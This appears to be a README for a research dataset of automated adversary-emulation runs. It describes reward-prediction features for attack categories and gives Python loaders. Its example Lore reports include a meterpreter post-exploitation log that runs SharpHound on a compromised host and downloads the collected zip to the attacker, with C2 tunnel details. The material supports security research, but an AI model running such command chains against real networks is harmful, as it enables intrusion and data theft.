The dataset in this repository is released to facilitate research on autonomous adversary emulation. It was gathered by running Lore scenarios against an emulated IT environment. For a full description, please see paper X. For seven action categories, a number of (feature, reward) samples are recorded. The task is to predict the reward from the features.
For any questions about the dataset, please contact blinded-author.
The table below maps each ActionCategory used in the dataset to the more descriptive name used in the paper:
ActionCategory | Paper name |
---|---|
CredentialHarvesting | Shellcode to extract credentials |
General | General |
MetasploitLocalExploit | Local exploits |
MetasploitPost | Miscellaneous shellcode |
MetasploitServerExploit | Server exploits |
MetasploitStandardAuxiliary | Auxiliary |
NetworkScanning | Network scanning |
OnlinePasswordGuessing | Online password guessing |
PasswordCracking | Password cracking |
.
├── evaluation
│   ├── crate_envs - description of the environment used
│   ├── lore_reports - description of carried out actions for the scenarios
│   └── lore_scenarios - description of config files for the scenarios
└── training
    ├── crate_envs - description of the environment used
    ├── lore_reports - description of carried out actions for the scenarios
    ├── lore_scenarios - description of config files for the scenarios
    └── ml_training_samples
        ├── MetasploitPost - action category
        │   ├── feature_schema.json - feature space description
        │   └── dataset_compressed_for_ml.json - (features, reward) samples
        ├── NetworkScanning
        │   ├── feature_schema.json
        │   └── dataset_compressed_for_ml.json
The directory training includes the samples that can be used for training ML models. The directory evaluation includes data about the tests used to provide a secondary evaluation of the trained models on a different IT environment and with a different Lore scenario configuration.
Each action category has its own feature space, so a separate model is essentially required for each category.
The feature space of a category is described in its feature_schema.json. An excerpt is explained below. The structure of dataset_compressed_for_ml.json is also explained below.
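Because every category has its own schema and sample file, a first step is usually to enumerate the category directories. The following is a minimal sketch, assuming the directory layout shown above; the helper name `find_categories` is hypothetical and not part of the dataset. The demo builds a throwaway directory so the snippet runs without the dataset being present.

```python
import tempfile
from pathlib import Path

SCHEMA_FILE = "feature_schema.json"
DATA_FILE = "dataset_compressed_for_ml.json"


def find_categories(samples_dir):
    """Map each action category name to its (schema, dataset) file paths."""
    categories = {}
    for sub in sorted(Path(samples_dir).iterdir()):
        schema, data = sub / SCHEMA_FILE, sub / DATA_FILE
        # Keep only directories that contain both expected files.
        if sub.is_dir() and schema.is_file() and data.is_file():
            categories[sub.name] = (schema, data)
    return categories


# Demo on a temporary directory that mimics the layout; with the real
# dataset, pass "training/ml_training_samples" instead.
with tempfile.TemporaryDirectory() as tmp:
    for name in ("MetasploitPost", "NetworkScanning"):
        category_dir = Path(tmp) / name
        category_dir.mkdir()
        (category_dir / SCHEMA_FILE).write_text("{}")
        (category_dir / DATA_FILE).write_text("{}")
    found = find_categories(tmp)
    print(list(found))
```

One model per entry of the returned dict can then be trained independently of the others.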
feature_schema.json
A subset of the feature groups, and of the features within them, for the Network Scanning category is shown below. Features can be integers (either categorical or regular), floats, booleans, or arrays.
{
  "properties": {
    "ConcernedAbstractAction": { <---- feature group
      "type": "object",
      "properties": {
        "concerned_abstract_action": { <--- feature in feature group
          "type": "integer", <---- feature type
          "description": "One hot encoding (index) of the chosen action uid.", <--- signifies categorical value
          "minimum": 0, <--- bounds for the values
          "maximum": 5533
        }
      }
    },
    "PreviousActionAttempts": {
      "type": "object",
      "properties": {
        "action_type_previous_tests_count": {
          "type": "integer",
          "description": "The number of times the action type has been used during the scenario session." <--- i.e. not categorical
        },
        "action_type_percent_successful": {
          "type": "float",
          "description": "The percentage of attempts that the action type has been successful during the scenario session.",
          "minimum": 0,
          "maximum": 1
        }
      }
    },
    "ActionBuilderDependencies": {
      "type": "object",
      "description": "Action builder dependencies.",
      "properties": {
        "action_builder_dependency_0": {
          "type": "array", <--- signifies multiple values for this feature
          "items": {
            "type": "float"
          },
          "minItems": 20, <--- length of array, currently minItems=maxItems for all arrays
          "maxItems": 20
        }
      }
    },
    "OverallTypeOfOperatingSystem": {
      "type": "object",
      "properties": {
        "os_type": { <--- another example of categorical feature
          "type": "integer",
          "description": "One hot encoding index of overall kind of operating system.",
          "minimum": 0,
          "maximum": 3
        }
      }
    },
    "AttackerAndVictimOnTheSameSubnet": {
      "type": "object",
      "properties": {
        "attacker_and_victim_on_the_same_subnet": {
          "type": "boolean", <--- can also be simple boolean
          "description": "If the attacker has access to resources on the same LAN as the victim, and thus can send traffic to it without worrying as much about firewall/nids rulesets etc."
        }
      }
    }
  }
}
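The schema can be walked programmatically to list each feature with its type and width. The sketch below is illustrative only: `describe_features` is a hypothetical helper, and treating an integer feature as categorical when its description mentions "One hot encoding" is a heuristic inferred from the excerpt above, not a documented rule. The small `example_schema` is a trimmed copy of the excerpt without the annotations.

```python
def describe_features(schema):
    """Return one summary row per feature found in a feature schema dict."""
    rows = []
    for group_name, group in schema["properties"].items():
        for feat_name, spec in group["properties"].items():
            is_array = spec["type"] == "array"
            rows.append({
                "group": group_name,
                "feature": feat_name,
                # For arrays, report the element type instead of "array".
                "type": spec["items"]["type"] if is_array else spec["type"],
                # Arrays have a fixed length (minItems == maxItems); scalars count as 1.
                "width": spec["minItems"] if is_array else 1,
                # Heuristic (assumption): categorical integers are flagged in the description.
                "categorical": spec["type"] == "integer"
                and "one hot encoding" in spec.get("description", "").lower(),
            })
    return rows


example_schema = {
    "properties": {
        "OverallTypeOfOperatingSystem": {
            "type": "object",
            "properties": {
                "os_type": {
                    "type": "integer",
                    "description": "One hot encoding index of overall kind of operating system.",
                    "minimum": 0,
                    "maximum": 3,
                }
            },
        },
        "ActionBuilderDependencies": {
            "type": "object",
            "properties": {
                "action_builder_dependency_0": {
                    "type": "array",
                    "items": {"type": "float"},
                    "minItems": 20,
                    "maxItems": 20,
                }
            },
        },
    }
}

rows = describe_features(example_schema)
for row in rows:
    print(row)
```

For a real category, the schema dict would come from `json.load` on that category's feature_schema.json.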
dataset_compressed_for_ml.json
Each dataset_compressed_for_ml.json has the same structure: a results key with a list of rewards and a features key with the features.
The features dict has the same structure as feature_schema.json, with each feature stored as a list of values.
The n-th entry of each feature list corresponds to the n-th reward.
{
  "results": [ float, float, float, float, ... ],
  "features": {
    "ConcernedAbstractAction": { <---- feature group
      "concerned_abstract_action": [0, 0, 4300, 0, ...]
    },
    "PreviousActionAttempts": {
      "action_type_previous_tests_count": [1, 0, 0, 100, ...],
      "action_type_percent_successful": [0.0, 0.2, 0.0, 0.1, ...]
    },
    "ActionBuilderDependencies": {
      # list of lists of length 20 (as described by feature schema)
      "action_builder_dependency_0": [[0, 0, ...], [0, 0, ...]]
    },
    "OverallTypeOfOperatingSystem": {
      "os_type": [0, 0, 3, 1, ...]
    },
    "AttackerAndVictimOnTheSameSubnet": {
      "attacker_and_victim_on_the_same_subnet": [0, 1, 0, 1, ...]
    }
  }
}
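Since the file stores each feature as a column, most ML libraries need it turned into one flat vector per sample. The following is a minimal sketch of that step; `to_rows` is a hypothetical helper, and the values in `example` are made up for illustration (arrays are shortened to length 2 instead of 20). Categorical indices are kept as raw numbers here, so a real pipeline would likely still need to one-hot encode them.

```python
def to_rows(dataset):
    """Turn the column-wise 'features' dict into one flat vector per sample."""
    rewards = dataset["results"]
    rows = [[] for _ in rewards]
    for group in dataset["features"].values():
        for values in group.values():
            # The n-th entry of every feature list belongs to the n-th reward.
            if len(values) != len(rewards):
                raise ValueError("feature list and reward list differ in length")
            for row, value in zip(rows, values):
                if isinstance(value, list):
                    # Array features contribute several columns.
                    row.extend(float(v) for v in value)
                else:
                    row.append(float(value))
    return rows, rewards


# Made-up miniature example with two samples.
example = {
    "results": [0.0, 1.5],
    "features": {
        "OverallTypeOfOperatingSystem": {"os_type": [0, 3]},
        "ActionBuilderDependencies": {
            "action_builder_dependency_0": [[0.0, 1.0], [2.0, 0.0]]
        },
        "AttackerAndVictimOnTheSameSubnet": {
            "attacker_and_victim_on_the_same_subnet": [0, 1]
        },
    },
}

X, y = to_rows(example)
print(X)  # [[0.0, 0.0, 1.0, 0.0], [3.0, 2.0, 0.0, 1.0]]
print(y)  # [0.0, 1.5]
```

The column order follows the order of groups and features in the file, so the same file should be used consistently for training and prediction.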
lore_reports
The .json files in the lore_reports directories contain the summary reports produced by Lore for the actions carried out during each executed scenario. Each report gives summary information about one executed action. Two example reports are given below.
{
  "action_category": "Metasploit",
  "action_description": "Determine what local users exist via the SAM RPC service",
  "action_info": {
    "attacker": "134.23.2.150:",
    "target": "134.23.4.44:"
  },
  "action_outcome": "SUCCESSFUL",
  "action_uid": "auxiliary/scanner/smb/smb_enumusers",
  "c2_info": null,
  "mitre_att&ck": {
    "tactics": [
      "TA0007"
    ],
    "techniques": [
      "T1087"
    ]
  },
  "time_end": "2024-06-05 04:23:36",
  "time_start": "2024-06-05 04:23:32"
},
{
  "action_category": "Metasploit.Shellcode",
  "action_description": "Runs BloodHound on a compromised machine as a powershell script (SharpHound.ps1) through a meterpreter session. A session can be matched either by the info-field, address-field, exploit field or session key.",
  "action_info": {
    "commands": [
      "mkdir c:\\\\temp\\\\",
      "load powershell",
      "powershell_import /mnt/sved/tools/SharpHound.ps1",
      "powershell_execute 'Invoke-BloodHound -CollectionMethod All -JSONFolder c:\\\\temp\\\\ -ZipFileName bh_404372.zip'",
      "download c:\\\\temp\\\\bh_404372.zip /mnt/sved/lore/scenarios/Tyrdemo_insider_ANN_1_session_4/reports/bh_404372.zip"
    ],
    "target": "hq01.office.tyrdemo.se"
  },
  "action_outcome": "SUCCESSFUL",
  "action_uid": "BloodHound",
  "c2_info": {
    "active_since": "2024-06-05 04:03:49",
    "established_via": "exploit/multi/handler",
    "shell_type": "meterpreter",
    "shell_user": "system",
    "tunnel_in": "134.23.2.150:8081",
    "tunnel_out": "134.23.3.11:50235"
  },
  "mitre_att&ck": {
    "tactics": [
      "TA0007"
    ],
    "techniques": [
      "T1087.001",
      "T1087.002",
      "T1069.002",
      "T1615",
      "T1018",
      "T1201"
    ]
  },
  "time_end": "2024-06-05 04:05:54",
  "time_start": "2024-06-05 04:05:04"
}
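Reports of this shape can be summarized with a few lines of code, for example to count outcomes and measure how long each action took. The sketch below assumes that a report file parses to a list of report objects like the two above, which is not confirmed here; `summarize` is a hypothetical helper. The two entries in `reports` reuse only the outcome, uid, and timestamp fields from the examples.

```python
from collections import Counter
from datetime import datetime

TIME_FORMAT = "%Y-%m-%d %H:%M:%S"


def summarize(reports):
    """Count action outcomes and compute the duration of each action in seconds."""
    outcomes = Counter(report["action_outcome"] for report in reports)
    durations = []
    for report in reports:
        start = datetime.strptime(report["time_start"], TIME_FORMAT)
        end = datetime.strptime(report["time_end"], TIME_FORMAT)
        durations.append((report["action_uid"], (end - start).total_seconds()))
    return outcomes, durations


# Fields copied from the two example reports above.
reports = [
    {
        "action_outcome": "SUCCESSFUL",
        "action_uid": "auxiliary/scanner/smb/smb_enumusers",
        "time_start": "2024-06-05 04:23:32",
        "time_end": "2024-06-05 04:23:36",
    },
    {
        "action_outcome": "SUCCESSFUL",
        "action_uid": "BloodHound",
        "time_start": "2024-06-05 04:05:04",
        "time_end": "2024-06-05 04:05:54",
    },
]

outcomes, durations = summarize(reports)
print(outcomes["SUCCESSFUL"])  # 2
print(durations)  # [('auxiliary/scanner/smb/smb_enumusers', 4.0), ('BloodHound', 50.0)]
```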
The reports in the evaluation directory are complete, i.e., they cover all Lore scenarios that were carried out. The reports in the training directory cover only a subset of the 923 Lore scenarios executed during training.
crate_envs
The crate_envs directories include descriptive information regarding the IT environments used for the scenarios.
lore_scenarios
The lore_scenarios directories include the Lore configuration files used for the scenarios.